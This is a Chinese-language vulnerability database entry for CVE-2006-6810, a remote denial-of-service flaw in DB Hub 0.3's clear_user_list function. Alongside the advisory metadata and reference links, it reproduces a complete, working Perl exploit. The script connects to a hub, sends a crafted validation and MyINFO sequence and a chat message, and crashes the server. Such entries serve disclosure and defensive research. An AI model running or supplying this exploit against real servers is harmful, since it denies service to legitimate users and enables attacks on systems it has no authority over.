DB Hub 'src/main.c' clear_user_list函数拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111880 漏洞类型 边界条件错误
发布时间 2006-12-27 更新时间 2007-01-04
CVE编号 CVE-2006-6810 CNNVD-ID CNNVD-200612-599
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/29362
https://www.securityfocus.com/bid/21791
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-599
|漏洞详情
DBHub0.3中src/main.c中的clear_user_list函数存在未明漏洞,远程攻击者可通过特制网络流量,触发内存破坏,从而发起拒绝服务攻击(应用程序崩溃)。
|漏洞EXP
source: http://www.securityfocus.com/bid/21791/info

A remote denial-of-service vulnerability affects the DB Hub application because of a memory-corruption flaw when the application attempts to process specially crafted network traffic.

An attacker may exploit this issue to crash affected applications, denying service to legitimate users.

DB Hub version 0.3 is vulnerable to this issue; other versions may also be affected.

#!/usr/bin/perl
# DB Hub (http://dbhub.ir.pl/) DoS exploit 
# Critical Security (http://www.critical.lt)

use IO::Socket;

my $host = $ARGV[0];
my $port = $ARGV[1];
my $nick = $ARGV[2];

print q( 
----------------------------------------------
|  DB Hub (http://dbhub.ir.pl/) DoS exploit  |
----------------------------------------------
);

if (@ARGV < 3) { 
  print "Usage: perl crit_dbhub.pl host port nick\n";
  exit();
}

if ($connect = IO::Socket::INET->new(PeerAddr => $host, 
                                     PeerPort => $port, 
                                     Proto => tcp,
                                     Timeout => 5 ) 
   or die "[-] Can't connect\n") 
    { 
     print "[+] Connected!\n";
    }

$res = $connect->recv($text,200);
if ($text = ~/Lock/) { $connect->send("\$Key vistiek_netikrina|\$ValidateNick $nick|"); }
$connect->send("\$Version 20|\$MyINFO \$ALL $nick  <++ V:0.674,M:A,H:1/0/0,S:11>\$ \$DSL.\$\$19313847685\$|\$GetNickList|");
$connect->send("<$nick>!|"); # xixi
print "[+] Data sent\n"; 
while($text) { $res = $connect->recv($text,200); }
print "[+] Done\n";
|受影响的产品
DB Hub DB Hub 0.3
|参考资料

来源:BID
名称:21791
链接:http://www.securityfocus.com/bid/21791
来源:MISC
链接:http://www.critical.lt/research/crit_dbhub.pl
来源:MISC
链接:http://www.critical.lt/?vuln/548
来源:XF
名称:dbhub-clearuserlist-dos(31172)
链接:http://xforce.iss.net/xforce/xfdb/31172
来源:VUPEN
名称:ADV-2006-5198
链接:http://www.frsirt.com/english/advisories/2006/5198
来源:VIM
名称:20070103ProvablevendorACKforCVE-2006-6810(DBHubDoS)
链接:http://www.attrition.org/pipermail/vim/2007-January/001204.html
来源:SECUNIA
名称:23489
链接:http://secunia.com/advisories/23489
来源:mieszkancy.ds.pg.gda.pl
链接:http://mieszkancy.ds.pg.gda.pl/~centurion/darkbot/stat/click.php?id=22
来源:dbhub.ir.pl
链接:http://dbhub.ir.pl/